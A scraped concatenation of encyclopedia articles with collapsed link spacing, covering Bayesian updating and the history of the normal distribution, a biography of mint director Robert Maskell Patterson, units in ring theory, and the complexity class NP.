ν0′=ν0+nν0′σ02′=ν0σ02+∑i=1n(xi−μ)2{\displaystyle {\begin{aligned}\nu _{0}'&=\nu _{0}+n\\\nu _{0}'{\sigma _{0}^{2}}'&=\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-\mu )^{2}\end{aligned}}} or equivalently ν0′=ν0+nσ02′=ν0σ02+∑i=1n(xi−μ)2ν0+n{\displaystyle {\begin{aligned}\nu _{0}'&=\nu _{0}+n\\{\sigma _{0}^{2}}'&={\frac {\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-\mu )^{2}}{\nu _{0}+n}}\end{aligned}}} Reparameterizing in terms of aninverse gamma distribution, the result is: α′=α+n2β′=β+∑i=1n(xi−μ)22{\displaystyle {\begin{aligned}\alpha '&=\alpha +{\frac {n}{2}}\\\beta '&=\beta +{\frac {\sum _{i=1}^{n}(x_{i}-\mu )^{2}}{2}}\end{aligned}}} For a set ofi.i.d.normally distributed data pointsXof sizenwhere each individual pointxfollowsx∼N(μ,σ2){\textstyle x\sim {\mathcal {N}}(\mu ,\sigma ^{2})}with unknown mean μ and unknownvarianceσ2, a combined (multivariate)conjugate prioris placed over the mean and variance, consisting of anormal-inverse-gamma distribution. Logically, this originates as follows: The priors are normally defined as follows: p(μ∣σ2;μ0,n0)∼N(μ0,σ2/n0)p(σ2;ν0,σ02)∼Iχ2(ν0,σ02)=IG(ν0/2,ν0σ02/2){\displaystyle {\begin{aligned}p(\mu \mid \sigma ^{2};\mu _{0},n_{0})&\sim {\mathcal {N}}(\mu _{0},\sigma ^{2}/n_{0})\\p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})&\sim I\chi ^{2}(\nu _{0},\sigma _{0}^{2})=IG(\nu _{0}/2,\nu _{0}\sigma _{0}^{2}/2)\end{aligned}}} The update equations can be derived, and look as follows: x¯=1n∑i=1nxiμ0′=n0μ0+nx¯n0+nn0′=n0+nν0′=ν0+nν0′σ02′=ν0σ02+∑i=1n(xi−x¯)2+n0nn0+n(μ0−x¯)2{\displaystyle {\begin{aligned}{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\\\mu _{0}'&={\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\\n_{0}'&=n_{0}+n\\\nu _{0}'&=\nu _{0}+n\\\nu _{0}'{\sigma _{0}^{2}}'&=\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\end{aligned}}} The respective numbers of pseudo-observations add the number of actual observations to them. The new mean hyperparameter is once again a weighted average, this time weighted by the relative numbers of observations. Finally, the update forν0′σ02′{\textstyle \nu _{0}'{\sigma _{0}^{2}}'}is similar to the case with known mean, but in this case the sum of squared deviations is taken with respect to the observed data mean rather than the true mean, and as a result a new interaction term needs to be added to take care of the additional error source stemming from the deviation between prior and data mean. The prior distributions arep(μ∣σ2;μ0,n0)∼N(μ0,σ2/n0)=12πσ2n0exp⁡(−n02σ2(μ−μ0)2)∝(σ2)−1/2exp⁡(−n02σ2(μ−μ0)2)p(σ2;ν0,σ02)∼Iχ2(ν0,σ02)=IG(ν0/2,ν0σ02/2)=(σ02ν0/2)ν0/2Γ(ν0/2)exp⁡[−ν0σ022σ2](σ2)1+ν0/2∝(σ2)−(1+ν0/2)exp⁡[−ν0σ022σ2].{\displaystyle {\begin{aligned}p(\mu \mid \sigma ^{2};\mu _{0},n_{0})&\sim {\mathcal {N}}(\mu _{0},\sigma ^{2}/n_{0})={\frac {1}{\sqrt {2\pi {\frac {\sigma ^{2}}{n_{0}}}}}}\exp \left(-{\frac {n_{0}}{2\sigma ^{2}}}(\mu -\mu _{0})^{2}\right)\\&\propto (\sigma ^{2})^{-1/2}\exp \left(-{\frac {n_{0}}{2\sigma ^{2}}}(\mu -\mu _{0})^{2}\right)\\p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})&\sim I\chi ^{2}(\nu _{0},\sigma _{0}^{2})=IG(\nu _{0}/2,\nu _{0}\sigma _{0}^{2}/2)\\&={\frac {(\sigma _{0}^{2}\nu _{0}/2)^{\nu _{0}/2}}{\Gamma (\nu _{0}/2)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+\nu _{0}/2}}}\\&\propto {(\sigma ^{2})^{-(1+\nu _{0}/2)}}\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right].\end{aligned}}} Therefore, the joint prior is p(μ,σ2;μ0,n0,ν0,σ02)=p(μ∣σ2;μ0,n0)p(σ2;ν0,σ02)∝(σ2)−(ν0+3)/2exp⁡[−12σ2(ν0σ02+n0(μ−μ0)2)].{\displaystyle {\begin{aligned}p(\mu ,\sigma ^{2};\mu _{0},n_{0},\nu _{0},\sigma _{0}^{2})&=p(\mu \mid \sigma ^{2};\mu _{0},n_{0})\,p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})\\&\propto (\sigma ^{2})^{-(\nu _{0}+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+n_{0}(\mu -\mu _{0})^{2}\right)\right].\end{aligned}}} Thelikelihood functionfrom the section above with known variance is: p(X∣μ,σ2)=(12πσ2)n/2exp⁡[−12σ2(∑i=1n(xi−μ)2)]{\displaystyle {\begin{aligned}p(\mathbf {X} \mid \mu ,\sigma ^{2})&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\sum _{i=1}^{n}(x_{i}-\mu )^{2}\right)\right]\end{aligned}}} Writing it in terms of variance rather than precision, we get:p(X∣μ,σ2)=(12πσ2)n/2exp⁡[−12σ2(∑i=1n(xi−x¯)2+n(x¯−μ)2)]∝σ2−n/2exp⁡[−12σ2(S+n(x¯−μ)2)]{\displaystyle {\begin{aligned}p(\mathbf {X} \mid \mu ,\sigma ^{2})&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]\\&\propto {\sigma ^{2}}^{-n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(S+n({\bar {x}}-\mu )^{2}\right)\right]\end{aligned}}}whereS=∑i=1n(xi−x¯)2.{\textstyle S=\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}.} Therefore, the posterior is (dropping the hyperparameters as conditioning factors):p(μ,σ2∣X)∝p(μ,σ2)p(X∣μ,σ2)∝(σ2)−(ν0+3)/2exp⁡[−12σ2(ν0σ02+n0(μ−μ0)2)]σ2−n/2exp⁡[−12σ2(S+n(x¯−μ)2)]=(σ2)−(ν0+n+3)/2exp⁡[−12σ2(ν0σ02+S+n0(μ−μ0)2+n(x¯−μ)2)]=(σ2)−(ν0+n+3)/2exp⁡[−12σ2(ν0σ02+S+n0nn0+n(μ0−x¯)2+(n0+n)(μ−n0μ0+nx¯n0+n)2)]∝(σ2)−1/2exp⁡[−n0+n2σ2(μ−n0μ0+nx¯n0+n)2]×(σ2)−(ν0/2+n/2+1)exp⁡[−12σ2(ν0σ02+S+n0nn0+n(μ0−x¯)2)]=Nμ∣σ2(n0μ0+nx¯n0+n,σ2n0+n)⋅IGσ2(12(ν0+n),12(ν0σ02+S+n0nn0+n(μ0−x¯)2)).{\displaystyle {\begin{aligned}p(\mu ,\sigma ^{2}\mid \mathbf {X} )&\propto p(\mu ,\sigma ^{2})\,p(\mathbf {X} \mid \mu ,\sigma ^{2})\\&\propto (\sigma ^{2})^{-(\nu _{0}+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+n_{0}(\mu -\mu _{0})^{2}\right)\right]{\sigma ^{2}}^{-n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(S+n({\bar {x}}-\mu )^{2}\right)\right]\\&=(\sigma ^{2})^{-(\nu _{0}+n+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+n_{0}(\mu -\mu _{0})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]\\&=(\sigma ^{2})^{-(\nu _{0}+n+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}+(n_{0}+n)\left(\mu -{\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\right)^{2}\right)\right]\\&\propto (\sigma ^{2})^{-1/2}\exp \left[-{\frac {n_{0}+n}{2\sigma ^{2}}}\left(\mu -{\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\right)^{2}\right]\\&\quad \times (\sigma ^{2})^{-(\nu _{0}/2+n/2+1)}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\right)\right]\\&={\mathcal {N}}_{\mu \mid \sigma ^{2}}\left({\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}},{\frac {\sigma ^{2}}{n_{0}+n}}\right)\cdot {\rm {IG}}_{\sigma ^{2}}\left({\frac {1}{2}}(\nu _{0}+n),{\frac {1}{2}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\right)\right).\end{aligned}}} In other words, the posterior distribution has the form of a product of a normal distribution overp(μ|σ2){\textstyle p(\mu |\sigma ^{2})}times an inverse gamma distribution overp(σ2){\textstyle p(\sigma ^{2})}, with parameters that are the same as the update equations above. The occurrence of normal distribution in practical problems can be loosely classified into four categories: Certain quantities inphysicsare distributed normally, as was first demonstrated byJames Clerk Maxwell. Examples of such quantities are: Approximatelynormal distributions occur in many situations, as explained by thecentral limit theorem. When the outcome is produced by many small effects actingadditively and independently, its distribution will be close to normal. The normal approximation will not be valid if the effects act multiplicatively (instead of additively), or if there is a single external influence that has a considerably larger magnitude than the rest of the effects. I can only recognize the occurrence of the normal curve – the Laplacian curve of errors – as a very abnormal phenomenon. It is roughly approximated to in certain distributions; for this reason, and on account for its beautiful simplicity, we may, perhaps, use it as a first approximation, particularly in theoretical investigations. There are statistical methods to empirically test that assumption; see the aboveNormality testssection. John Ioannidisarguedthat using normally distributed standard deviations as standards for validating research findings leavefalsifiable predictionsabout phenomena that are not normally distributed untested. This includes, for example, phenomena that only appear when all necessary conditions are present and one cannot be a substitute for another in an addition-like way and phenomena that are not randomly distributed. Ioannidis argues that standard deviation-centered validation gives a false appearance of validity to hypotheses and theories where some but not all falsifiable predictions are normally distributed since the portion of falsifiable predictions that there is evidence against may and in some cases are in the non-normally distributed parts of the range of falsifiable predictions, as well as baselessly dismissing hypotheses for which none of the falsifiable predictions are normally distributed as if were they unfalsifiable when in fact they do make falsifiable predictions. It is argued by Ioannidis that many cases of mutually exclusive theories being accepted as validated by research journals are caused by failure of the journals to take in empirical falsifications of non-normally distributed predictions, and not because mutually exclusive theories are true, which they cannot be, although two mutually exclusive theories can both be wrong and a third one correct.[58] In computer simulations, especially in applications of theMonte-Carlo method, it is often desirable to generate values that are normally distributed. The algorithms listed below all generate the standard normal deviates, since aN(μ,σ2)can be generated asX=μ+σZ, whereZis standard normal. All these algorithms rely on the availability of arandom number generatorUcapable of producinguniformrandom variates. The standard normalcumulative distribution functionis widely used in scientific and statistical computing. The values Φ(x) may be approximated very accurately by a variety of methods, such asnumerical integration,Taylor series,asymptotic seriesandcontinued fractions. Different approximations are used depending on the desired level of accuracy. 1−Φ(x)=1−(1−Φ(−x)){\displaystyle 1-\Phi \left(x\right)=1-\left(1-\Phi \left(-x\right)\right)} Shore (1982) introduced simple approximations that may be incorporated in stochastic optimization models of engineering and operations research, like reliability engineering and inventory analysis. Denotingp= Φ(z), the simplest approximation for the quantile function is:z=Φ−1(p)=5.5556[1−(1−pp)0.1186],p≥1/2{\displaystyle z=\Phi ^{-1}(p)=5.5556\left[1-\left({\frac {1-p}{p}}\right)^{0.1186}\right],\qquad p\geq 1/2} This approximation delivers forza maximum absolute error of 0.026 (for0.5 ≤p≤ 0.9999, corresponding to0 ≤z≤ 3.719). Forp< 1/2replacepby1 −pand change sign. Another approximation, somewhat less accurate, is the single-parameter approximation:z=−0.4115{1−pp+log⁡[1−pp]−1},p≥1/2{\displaystyle z=-0.4115\left\{{\frac {1-p}{p}}+\log \left[{\frac {1-p}{p}}\right]-1\right\},\qquad p\geq 1/2} The latter had served to derive a simple approximation for the loss integral of the normal distribution, defined byL(z)=∫z∞(u−z)φ(u)du=∫z∞[1−Φ(u)]duL(z)≈{0.4115(p1−p)−z,p<1/2,0.4115(1−pp),p≥1/2.or, equivalently,L(z)≈{0.4115{1−log⁡[p1−p]},p<1/2,0.41151−pp,p≥1/2.{\displaystyle {\begin{aligned}L(z)&=\int _{z}^{\infty }(u-z)\varphi (u)\,du=\int _{z}^{\infty }[1-\Phi (u)]\,du\\[5pt]L(z)&\approx {\begin{cases}0.4115\left({\dfrac {p}{1-p}}\right)-z,&p<1/2,\\\\0.4115\left({\dfrac {1-p}{p}}\right),&p\geq 1/2.\end{cases}}\\[5pt]{\text{or, equivalently,}}\\L(z)&\approx {\begin{cases}0.4115\left\{1-\log \left[{\frac {p}{1-p}}\right]\right\},&p<1/2,\\\\0.4115{\dfrac {1-p}{p}},&p\geq 1/2.\end{cases}}\end{aligned}}} This approximation is particularly accurate for the right far-tail (maximum error of 10−3for z≥1.4). Highly accurate approximations for the cumulative distribution function, based onResponse Modeling Methodology(RMM, Shore, 2011, 2012), are shown in Shore (2005). Some more approximations can be found at:Error function#Approximation with elementary functions. In particular, smallrelativeerror on the whole domain for the cumulative distribution function⁠Φ{\displaystyle \Phi }⁠and the quantile functionΦ−1{\textstyle \Phi ^{-1}}as well, is achieved via an explicitly invertible formula by Sergei Winitzki in 2008. Some authors[68][69]attribute the discovery of the normal distribution tode Moivre, who in 1738[note 2]published in the second edition of hisThe Doctrine of Chancesthe study of the coefficients in thebinomial expansionof(a+b)n. De Moivre proved that the middle term in this expansion has the approximate magnitude of2n/2πn{\textstyle 2^{n}/{\sqrt {2\pi n}}}, and that "Ifmor⁠1/2⁠nbe a Quantity infinitely great, then the Logarithm of the Ratio, which a Term distant from the middle by the Intervalℓ, has to the middle Term, is−2ℓℓn{\textstyle -{\frac {2\ell \ell }{n}}}."[70]Although this theorem can be interpreted as the first obscure expression for the normal probability law,Stiglerpoints out that de Moivre himself did not interpret his results as anything more than the approximate rule for the binomial coefficients, and in particular de Moivre lacked the concept of the probability density function.[71] In 1823Gausspublished his monograph"Theoria combinationis observationum erroribus minimis obnoxiae"where among other things he introduces several important statistical concepts, such as themethod of least squares, themethod of maximum likelihood, and thenormal distribution. Gauss usedM,M′,M′′, ...to denote the measurements of some unknown quantityV, and sought the most probable estimator of that quantity: the one that maximizes the probabilityφ(M−V) ·φ(M′−V) ·φ(M′′ −V) · ...of obtaining the observed experimental results. In his notation φΔ is the probability density function of the measurement errors of magnitude Δ. Not knowing what the functionφis, Gauss requires that his method should reduce to the well-known answer: the arithmetic mean of the measured values.[note 3]Starting from these principles, Gauss demonstrates that the only law that rationalizes the choice of arithmetic mean as an estimator of the location parameter, is the normal law of errors:[72]φΔ=h√πe−hhΔΔ,{\displaystyle \varphi {\mathit {\Delta }}={\frac {h}{\surd \pi }}\,e^{-\mathrm {hh} \Delta \Delta },}wherehis "the measure of the precision of the observations". Using this normal law as a generic model for errors in the experiments, Gauss formulates what is now known as thenon-linearweighted least squaresmethod.[73] Although Gauss was the first to suggest the normal distribution law,Laplacemade significant contributions.[note 4]It was Laplace who first posed the problem of aggregating several observations in 1774,[74]although his own solution led to theLaplacian distribution. It was Laplace who first calculated the value of theintegral∫e−t2dt=√πin 1782, providing the normalization constant for the normal distribution.[75]For this accomplishment, Gauss acknowledged the priority of Laplace.[76]Finally, it was Laplace who in 1810 proved and presented to the academy the fundamentalcentral limit theorem, which emphasized the theoretical importance of the normal distribution.[77] It is of interest to note that in 1809 an Irish-American mathematicianRobert Adrainpublished two insightful but flawed derivations of the normal probability law, simultaneously and independently from Gauss.[78]His works remained largely unnoticed by the scientific community, until in 1871 they were exhumed byAbbe.[79] In the middle of the 19th centuryMaxwelldemonstrated that the normal distribution is not just a convenient mathematical tool, but may also occur in natural phenomena:[80]The number of particles whose velocity, resolved in a certain direction, lies betweenxandx+dxisN⁡1απe−x2α2dx{\displaystyle \operatorname {N} {\frac {1}{\alpha \;{\sqrt {\pi }}}}\;e^{-{\frac {x^{2}}{\alpha ^{2}}}}\,dx} Today, the concept is usually known in English as thenormal distributionorGaussian distribution. Other less common names include Gauss distribution, Laplace–Gauss distribution, the law of error, the law of facility of errors, Laplace's second law, and Gaussian law. Gauss himself apparently coined the term with reference to the "normal equations" involved in its applications, with normal having its technical meaning of orthogonal rather than usual.[81]However, by the end of the 19th century some authors[note 5]had started using the namenormal distribution, where the word "normal" was used as an adjective – the term now being seen as a reflection of the fact that this distribution was seen as typical, common – and thus normal.Peirce(one of those authors) once defined "normal" thus: "...the 'normal' is not the average (or any other kind of mean) of what actually occurs, but of whatwould, in the long run, occur under certain circumstances."[82]Around the turn of the 20th centuryPearsonpopularized the termnormalas a designation for this distribution.[83] Many years ago I called the Laplace–Gaussian curve thenormalcurve, which name, while it avoids an international question of priority, has the disadvantage of leading people to believe that all other distributions of frequency are in one sense or another 'abnormal'. Also, it was Pearson who first wrote the distribution in terms of the standard deviationσas in modern notation. Soon after this, in year 1915,Fisheradded the location parameter to the formula for normal distribution, expressing it in the way it is written nowadays:df=12σ2πe−(x−m)2/(2σ2)dx.{\displaystyle df={\frac {1}{\sqrt {2\sigma ^{2}\pi }}}e^{-(x-m)^{2}/(2\sigma ^{2})}\,dx.} The term "standard normal", which denotes the normal distribution with zero mean and unit variance came into general use around the 1950s, appearing in the popular textbooks by P. G. Hoel (1947)Introduction to Mathematical Statisticsand A. M. Mood (1950)Introduction to the Theory of Statistics.[84]
https://en.wikipedia.org/wiki/Normal_distribution
Robert Maskell Patterson(March 23, 1787 – September 5, 1854) was an American professor of mathematics, chemistry and natural philosophy at theUniversity of Pennsylvaniafrom 1812 to 1828 and professor ofnatural philosophyat theUniversity of Virginiafrom 1828 to 1835. He served as the 6th director of theUnited States Mintfrom 1835 to 1851 and as president of theAmerican Philosophical Societyfrom 1809 to 1854.[1][2] Patterson was born on March 23, 1787, inPhiladelphia,[3]one of eight children ofRobert Pattersonand Amy Hunter Ewing.[4]Patterson attended theUniversity of Pennsylvaniaand graduated in 1804 with aB.A.. He studied medicine underBenjamin Smith Barton[5]and graduated with aM.D.in 1808.[6]He continued his education in Paris, France at theJardins des plantes, and studied withRené Just Haüy,[7]Louis Nicolas Vauquelin,Adrien-Marie LegendreandSiméon Denis Poisson.[8]In 1811, Patterson travelled to England and studied withHumphry Davy.[7] He returned to the United States in 1812 and was appointed professor of natural philosophy, chemistry and mathematics in the department of medicine at the University of Pennsylvania. He was appointed vice provost in 1814.[7]Patterson remained at Penn until 1828 when he joined the faculty of the University of Virginia. He was elected an Associate Fellow of theAmerican Academy of Arts and Sciencesin 1834.[9]Patterson was nominated as director of the U.S. Mint by President Andrew Jackson[10][11]and served from 1835 to 1851.[12]In 1807, Patterson and his father were consulted byFerdinand Rudolph Hasslerfor guidance on theUnited States Coast and Geodetic Survey. In 1826, Patterson was Consulted by the governor of Pennsylvania to determine the best source of water for a state canal.[8] He was active in theFranklin Institute, the Musical Fund Society of Philadelphia and thePennsylvania Institution for the Instruction of the Blind.[6] Patterson died on September 5, 1854, in Philadelphia,[13]and was interred atLaurel Hill Cemetery.[14]He was married to Helen Hamilton Leiper, daughter ofThomas Leiper, on April 20, 1814,[15]and together they had six children.[8] Patterson was the youngest person elected to theAmerican Philosophical Societyat 22 in 1809. He served as secretary in 1813, as vice-president in 1825, and as president in 1849.[13] Citations Sources
https://en.wikipedia.org/wiki/Perfect_cipher
Inalgebra, aunitorinvertible element[a]of aringis aninvertible elementfor the multiplication of the ring. That is, an elementuof a ringRis a unit if there existsvinRsuch thatvu=uv=1,{\displaystyle vu=uv=1,}where1is themultiplicative identity; the elementvis unique for this property and is called themultiplicative inverseofu.[1][2]The set of units ofRforms agroupR×under multiplication, called thegroup of unitsorunit groupofR.[b]Other notations for the unit group areR∗,U(R), andE(R)(from the German termEinheit). Less commonly, the termunitis sometimes used to refer to the element1of the ring, in expressions likering with a unitorunit ring, and alsounit matrix. Because of this ambiguity,1is more commonly called the "unity" or the "identity" of the ring, and the phrases "ring with unity" or a "ring with identity" may be used to emphasize that one is considering a ring instead of arng. The multiplicative identity1and its additive inverse−1are always units. More generally, anyroot of unityin a ringRis a unit: ifrn= 1, thenrn−1is a multiplicative inverse ofr. In anonzero ring, theelement 0is not a unit, soR×is not closed under addition. A nonzero ringRin which every nonzero element is a unit (that is,R×=R∖ {0}) is called adivision ring(or a skew-field). A commutative division ring is called afield. For example, the unit group of the field ofreal numbersRisR∖ {0}. In the ring ofintegersZ, the only units are1and−1. In the ringZ/nZofintegers modulon, the units are the congruence classes(modn)represented by integerscoprimeton. They constitute themultiplicative group of integers modulon. In the ringZ[√3]obtained by adjoining thequadratic integer√3toZ, one has(2 +√3)(2 −√3) = 1, so2 +√3is a unit, and so are its powers, soZ[√3]has infinitely many units. More generally, for thering of integersRin anumber fieldF,Dirichlet's unit theoremstates thatR×is isomorphic to the groupZn×μR{\displaystyle \mathbf {Z} ^{n}\times \mu _{R}}whereμR{\displaystyle \mu _{R}}is the (finite, cyclic) group of roots of unity inRandn, therankof the unit group, isn=r1+r2−1,{\displaystyle n=r_{1}+r_{2}-1,}wherer1,r2{\displaystyle r_{1},r_{2}}are the number of real embeddings and the number of pairs of complex embeddings ofF, respectively. This recovers theZ[√3]example: The unit group of (the ring of integers of) areal quadratic fieldis infinite of rank 1, sincer1=2,r2=0{\displaystyle r_{1}=2,r_{2}=0}. For a commutative ringR, the units of thepolynomial ringR[x]are the polynomialsp(x)=a0+a1x+⋯+anxn{\displaystyle p(x)=a_{0}+a_{1}x+\dots +a_{n}x^{n}}such thata0is a unit inRand the remaining coefficientsa1,…,an{\displaystyle a_{1},\dots ,a_{n}}arenilpotent, i.e., satisfyaiN=0{\displaystyle a_{i}^{N}=0}for someN.[4]In particular, ifRis adomain(or more generallyreduced), then the units ofR[x]are the units ofR. The units of thepower series ringR[[x]]{\displaystyle R[[x]]}are the power seriesp(x)=∑i=0∞aixi{\displaystyle p(x)=\sum _{i=0}^{\infty }a_{i}x^{i}}such thata0is a unit inR.[5] The unit group of the ringMn(R)ofn×nmatricesover a ringRis the groupGLn(R)ofinvertible matrices. For a commutative ringR, an elementAofMn(R)is invertible if and only if thedeterminantofAis invertible inR. In that case,A−1can be given explicitly in terms of theadjugate matrix. For elementsxandyin a ringR, if1−xy{\displaystyle 1-xy}is invertible, then1−yx{\displaystyle 1-yx}is invertible with inverse1+y(1−xy)−1x{\displaystyle 1+y(1-xy)^{-1}x};[6]this formula can be guessed, but not proved, by the following calculation in a ring of noncommutative power series:(1−yx)−1=∑n≥0(yx)n=1+y(∑n≥0(xy)n)x=1+y(1−xy)−1x.{\displaystyle (1-yx)^{-1}=\sum _{n\geq 0}(yx)^{n}=1+y\left(\sum _{n\geq 0}(xy)^{n}\right)x=1+y(1-xy)^{-1}x.}SeeHua's identityfor similar results. Acommutative ringis alocal ringifR∖R×is amaximal ideal. As it turns out, ifR∖R×is an ideal, then it is necessarily amaximal idealandRislocalsince amaximal idealis disjoint fromR×. IfRis afinite field, thenR×is acyclic groupof order|R| − 1. Everyring homomorphismf:R→Sinduces agroup homomorphismR×→S×, sincefmaps units to units. In fact, the formation of the unit group defines afunctorfrom thecategory of ringsto thecategory of groups. This functor has aleft adjointwhich is the integralgroup ringconstruction.[7] Thegroup schemeGL1{\displaystyle \operatorname {GL} _{1}}is isomorphic to themultiplicative group schemeGm{\displaystyle \mathbb {G} _{m}}over any base, so for any commutative ringR, the groupsGL1⁡(R){\displaystyle \operatorname {GL} _{1}(R)}andGm(R){\displaystyle \mathbb {G} _{m}(R)}are canonically isomorphic toU(R). Note that the functorGm{\displaystyle \mathbb {G} _{m}}(that is,R↦U(R)) isrepresentablein the sense:Gm(R)≃Hom⁡(Z[t,t−1],R){\displaystyle \mathbb {G} _{m}(R)\simeq \operatorname {Hom} (\mathbb {Z} [t,t^{-1}],R)}for commutative ringsR(this for instance follows from the aforementioned adjoint relation with the group ring construction). Explicitly this means that there is a natural bijection between the set of the ring homomorphismsZ[t,t−1]→R{\displaystyle \mathbb {Z} [t,t^{-1}]\to R}and the set of unit elements ofR(in contrast,Z[t]{\displaystyle \mathbb {Z} [t]}represents the additive groupGa{\displaystyle \mathbb {G} _{a}}, theforgetful functorfrom the category of commutative rings to thecategory of abelian groups). Suppose thatRis commutative. ElementsrandsofRare calledassociateif there exists a unituinRsuch thatr=us; then writer~s. In any ring, pairs ofadditive inverseelements[c]xand−xareassociate, since any ring includes the unit−1. For example, 6 and −6 are associate inZ. In general,~is anequivalence relationonR. Associatedness can also be described in terms of theactionofR×onRvia multiplication: Two elements ofRare associate if they are in the sameR×-orbit. In anintegral domain, the set of associates of a given nonzero element has the samecardinalityasR×. The equivalence relation~can be viewed as any one ofGreen's semigroup relationsspecialized to the multiplicativesemigroupof a commutative ringR.
https://en.wikipedia.org/wiki/Group_of_units#Example:_The_group_of_units_of_Z_n
Incomputational complexity theory,NP(nondeterministic polynomial time) is acomplexity classused to classifydecision problems. NP is thesetof decision problems for which theproblem instances, where the answer is "yes", haveproofsverifiable inpolynomial timeby adeterministic Turing machine, or alternatively the set of problems that can be solved in polynomial time by anondeterministic Turing machine.[2][Note 1] The first definition is the basis for the abbreviation NP; "nondeterministic, polynomial time". These two definitions are equivalent because the algorithm based on the Turing machine consists of two phases, the first of which consists of a guess about the solution, which is generated in a nondeterministic way, while the second phase consists of a deterministic algorithm that verifies whether the guess is a solution to the problem.[3] The complexity classP(all problems solvable, deterministically, in polynomial time) is contained in NP (problems where solutions can be verified in polynomial time), because if a problem is solvable in polynomial time, then a solution is also verifiable in polynomial time by simply solving the problem. It is widely believed, but not proven, thatP is smaller than NP, in other words, that decision problems exist that cannot be solved in polynomial time even though their solutions can be checked in polynomial time. The hardest problems in NP are calledNP-completeproblems. An algorithm solving such a problem in polynomial time is also able to solve any other NP problem in polynomial time. If P were in fact equal to NP, then a polynomial-time algorithm would exist for solving NP-complete, and by corollary, all NP problems.[4] The complexity class NP is related to the complexity classco-NP, for which the answer "no" can be verified in polynomial time. Whether or notNP = co-NPis another outstanding question in complexity theory.[5] The complexity class NP can be defined in terms ofNTIMEas follows: whereNTIME(nk){\displaystyle {\mathsf {NTIME}}(n^{k})}is the set of decision problems that can be solved by anondeterministic Turing machineinO(nk){\displaystyle O(n^{k})}time. Equivalently, NP can be defined using deterministic Turing machines as verifiers. AlanguageLis in NP if and only if there exist polynomialspandq, and a deterministic Turing machineM, such that Manycomputer scienceproblems are contained in NP, like decision versions of manysearchand optimization problems. In order to explain the verifier-based definition of NP, consider thesubset sum problem: Assume that we are given someintegers, {−7, −3, −2, 5, 8}, and we wish to know whether some of these integers sum up to zero. Here the answer is "yes", since the integers {−3, −2, 5} corresponds to the sum(−3) + (−2) + 5 = 0. To answer whether some of the integers add to zero we can create an algorithm that obtains all the possible subsets. As the number of integers that we feed into the algorithm becomes larger, both the number of subsets and the computation time grows exponentially. But notice that if we are given a particular subset, we canefficiently verifywhether the subset sum is zero, by summing the integers of the subset. If the sum is zero, that subset is aprooforwitnessfor the answer is "yes". An algorithm that verifies whether a given subset has sum zero is averifier. Clearly, summing the integers of a subset can be done in polynomial time, and the subset sum problem is therefore in NP. The above example can be generalized for any decision problem. Given any instance I of problemΠ{\displaystyle \Pi }and witness W, if there exists averifierV so that given the ordered pair (I, W) as input, V returns "yes" in polynomial time if the witness proves that the answer is "yes" or "no" in polynomial time otherwise, thenΠ{\displaystyle \Pi }is in NP. The "no"-answer version of this problem is stated as: "given a finite set of integers, does every non-empty subset have a nonzero sum?". The verifier-based definition of NP doesnotrequire an efficient verifier for the "no"-answers. The class of problems with such verifiers for the "no"-answers is called co-NP. In fact, it is an open question whether all problems in NP also have verifiers for the "no"-answers and thus are in co-NP. In some literature the verifier is called the "certifier", and the witness the "certificate".[2] Equivalent to the verifier-based definition is the following characterization: NP is the class ofdecision problemssolvable by anondeterministic Turing machinethat runs inpolynomial time. That is to say, a decision problemΠ{\displaystyle \Pi }is in NP wheneverΠ{\displaystyle \Pi }is recognized by some polynomial-time nondeterministic Turing machineM{\displaystyle M}with anexistential acceptance condition, meaning thatw∈Π{\displaystyle w\in \Pi }if and only if some computation path ofM(w){\displaystyle M(w)}leads to an accepting state. This definition is equivalent to the verifier-based definition because a nondeterministic Turing machine could solve an NP problem in polynomial time by nondeterministically selecting a certificate and running the verifier on the certificate. Similarly, if such a machine exists, then a polynomial time verifier can naturally be constructed from it. In this light, we can define co-NP dually as the class of decision problems recognizable by polynomial-time nondeterministic Turing machines with an existential rejection condition. Since an existential rejection condition is exactly the same thing as auniversal acceptance condition, we can understand theNP vs. co-NPquestion as asking whether the existential and universal acceptance conditions have the same expressive power for the class of polynomial-time nondeterministic Turing machines. NP is closed underunion,intersection,concatenation,Kleene starandreversal. It is not known whether NP is closed undercomplement(this question is the so-called 